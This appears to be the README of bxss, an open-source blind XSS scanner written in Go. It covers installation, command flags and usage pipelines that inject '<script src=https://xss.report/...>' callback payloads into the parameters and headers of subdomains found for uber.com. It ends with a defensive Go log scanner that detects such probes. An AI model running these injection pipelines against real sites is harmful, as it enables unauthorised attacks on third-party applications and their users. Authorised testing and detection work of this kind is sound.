Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications.

ethicalhackingplayground/bxss

Bxss - Blind XSS Scanner

🚀 Description

Bxss is a high-performance Blind XSS scanner that automates the detection of blind XSS vulnerabilities in web applications.


✨ Features

  • Injects Blind XSS payloads into custom headers & parameters
  • Supports multiple HTTP methods (PUT, POST, GET, OPTIONS)
  • High-speed scanning with concurrency support
  • Easily chainable with other tools
  • Simple installation and usage

🧪 Experimental Features

  • Trace mode (experimental)

📦 Installation

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

βš™οΈ Arguments

| Argument | Description | Default |
|---|---|---|
| -a | Append the payload to the parameter | false |
| -c int | Set the concurrency level | 30 |
| -H string | Set a custom header | "" |
| -hf string | Path to file with headers | "" |
| -p string | The blind XSS payload | "" |
| -pf string | Path to file with payloads | "" |
| -t | Test parameters for blind XSS | false |
| -X string | HTTP method to use | "" |
| -v | Enable debug mode | false |
| -rl float | Rate limit (requests per second) | 0 |
| -f | Follow redirects | false |
| -l | Enable Trace Mode (experimental) | false |

🎬 Demonstration

[Demo animation]


πŸ“ What is Trace mode?

Trace mode is an experimental feature that lets you track where the blind XSS got triggered. Some third-party blind XSS platforms, such as https://xss.report/, allow you to specify custom parameters in your payloads, and bxss uses this to record where the payload fired. For example, if you specify the parameter url=https://somehost.com in your payload, the tool will use the payload

'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

for testing and upon a trigger you will be able to inspect the DOM and see what host the BlindXSS got triggered from.

[Image: Xss Report dashboard]

Make sure, when assigning custom parameters in your dashboard, that you assign url={LINK} so bxss can automatically replace {LINK} with the actual URL.

🔥 Usage Examples

Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Append To Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

Both Headers & Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

X-Forwarded-For Header

subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Custom Headers & Parameters

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks With Dorki

curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
"https://dorki.attaxa.com/api/search?q=site:example.com" -s \
| jq -r '.[][].url' \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Custom Headers & Parameters With Rate Limit

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
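From the defender's side, the header and parameter injections these examples describe show up in server logs as request fields carrying a `<script src=...>` reference to an external host. The Go program below is an added example for this page, not bxss's own code: it assumes a constructed log record shape (`LogEntry`, with the request path and a few headers) and uses `callback.example` as a placeholder for whatever blind XSS platform a probe reports back to. It decodes each query parameter and each recorded header, reports which field carried a probe and which callback host the injected script points at, and ignores benign values.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"sort"
	"strings"
)

// LogEntry is a constructed, minimal view of one request as a reverse proxy or
// WAF might record it. It is not bxss's own data format.
type LogEntry struct {
	Path    string            // request path including the query string
	Headers map[string]string // headers that user input can reach
}

// Finding records one request field that carried a <script src=...> probe.
type Finding struct {
	Line     int    // 1-based index of the entry in the input
	Location string // "query:<param>" or "header:<name>"
	Callback string // host the injected script points at
}

// scriptSrc matches the "<script src=https://host/..." shape of the payloads in
// the usage examples and captures the callback host. Protocol-relative
// (//host) and quoted src values are accepted too.
var scriptSrc = regexp.MustCompile(`(?i)<script[^>]*\bsrc\s*=\s*["']?(?:https?:)?//([^/"'>\s]+)`)

// probeHost returns the callback host of a value that embeds a script probe,
// or "" when the value looks benign.
func probeHost(v string) string {
	// Probes in query strings usually arrive URL-encoded; decode on a best
	// effort basis and keep the raw value when decoding fails.
	decoded := v
	if d, err := url.QueryUnescape(v); err == nil {
		decoded = d
	}
	if m := scriptSrc.FindStringSubmatch(decoded); m != nil {
		return strings.ToLower(m[1])
	}
	return ""
}

// inspect checks every query parameter and every recorded header of each entry
// and returns the findings in a deterministic order (by entry, then field).
func inspect(entries []LogEntry) []Finding {
	var out []Finding
	for i, e := range entries {
		u, err := url.Parse(e.Path)
		if err != nil {
			continue // malformed path: nothing to inspect
		}
		for name, vals := range u.Query() {
			for _, v := range vals {
				if h := probeHost(v); h != "" {
					out = append(out, Finding{Line: i + 1, Location: "query:" + name, Callback: h})
				}
			}
		}
		for name, v := range e.Headers {
			if h := probeHost(v); h != "" {
				out = append(out, Finding{Line: i + 1, Location: "header:" + name, Callback: h})
			}
		}
	}
	sort.Slice(out, func(a, b int) bool {
		if out[a].Line != out[b].Line {
			return out[a].Line < out[b].Line
		}
		return out[a].Location < out[b].Location
	})
	return out
}

// sampleEntries are constructed for this example; callback.example is a
// placeholder for the blind XSS platform a probe reports back to.
var sampleEntries = []LogEntry{
	{Path: "/search?q=hello+world", Headers: map[string]string{"User-Agent": "Mozilla/5.0"}},
	{Path: "/search?q=%27%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fcallback.example%2Fc%2Fabc%3E%3C%2Fscript%3E",
		Headers: map[string]string{"User-Agent": "Mozilla/5.0"}},
	{Path: "/api/items?id=42&sort=asc", Headers: map[string]string{
		"User-Agent":      "Mozilla/5.0",
		"X-Forwarded-For": `'"><script src=//callback.example/c/abc></script>`,
	}},
}

func main() {
	for _, f := range inspect(sampleEntries) {
		fmt.Printf("entry %d: blind XSS probe in %s -> %s\n", f.Line, f.Location, f.Callback)
	}
}
```

Run it with `go run .` and it reports the encoded probe in the `q` parameter of the second entry and the probe in the `X-Forwarded-For` header of the third; the first entry produces nothing. The callback host is the most useful field to pivot on, since a single blind XSS campaign typically points every injected field at the same collector.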

For advanced dorking and vulnerability exploration, check out Dorki and sign up today!


☕ Support the Project

If you get a bounty using this tool, consider supporting by buying me a coffee!